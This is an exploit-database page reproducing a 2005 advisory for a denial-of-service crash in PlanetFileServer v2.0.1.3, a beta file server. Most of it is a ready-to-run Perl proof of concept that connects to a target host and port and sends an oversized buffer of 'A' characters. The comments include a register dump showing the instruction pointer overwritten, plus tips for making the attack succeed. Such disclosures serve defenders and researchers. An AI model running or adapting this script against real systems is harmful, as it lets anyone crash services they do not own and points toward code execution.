Vulners
Lucene search
dosPlanet.txt
`Software: PlanetFileServer
Corporation: PlanetDNS Software
Version: v2.0.1.3
Vulnerability: Denial of Service - Crash Vulnerability
-------------------------------
BACKGROUND
__________
PlanetFileServer v2.0.1.3 is a BETA product
PlanetDNS provides products and services that enable you to host your own web server,
e-mail server, FTP server and more, using your own computer and your existing Internet connection.
PlanetFileServer Standard is available only in "BETA Downloads".
All of PlanetDNS' products undergo extensive internal and external testing before release.
During external testing we provide pre-release versions of our software free of charge to
selected testers (individuals and organizations) for their use, in return for which the
testers provide feedback on any problems they have found and comments on the product.
Source: www.planetdns.net
Software: www.planetdns.net/client/beta/pfilestd32v201.exe
Proof of Concept
________________
#!/usr/bin/perl
# Vulnerability: Denial Of Service - Crash
# Discovered on: June 28, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# ----------- // Registers // -----------
# Dynamic Library Link of "NewAce Corporation" called "mshftp.dll" is the real problem.
# varmodAddVariable() returned error code %d
# EAX 0163D940
# ECX 41414141
# EDX 784751B6
# EBX 0163FFDC
# ESP 0163D8A8
# EBP 0163D8C8
# ESI 0163D968
# EDI 00000400
# EIP 41414141
# ------------------------------------
use IO::Socket;
use strict;
if(!$ARGV[1]) {
die "Utilisation: perl -w pfsdos.pl \n";
}
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],PeerPort => $ARGV[1],Proto => "TCP"))
{
print "\n\nPlanetDNS Software - PlanetFileServer v2.0.1.3\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
print "[+] Connexion sur $ARGV[0]:$ARGV[1] ...\r\n";
print "[+] Envoi du buffer malicieux.";
# On our config the value "134891" is the min for DoS, but more is better for a great successfull exploitation.
# Security Filter Option used 7 levels, so ....
# If you change levels to the max you must set the buffer size or use this PoC 2 times, it works well.
print $socket "\x41" x 135000 . "\r\n";
close($socket);
}
else
{
print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]\n";
}
-----------------------------------
Vendor have been contacted on: 1, July 2005
Software will be corrected in the future versions.
-----------------------------------
fRoGGz - unsecure[at]writeme[dot]com
SecuBox Labs - secubox[dot]teria[dot]org
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4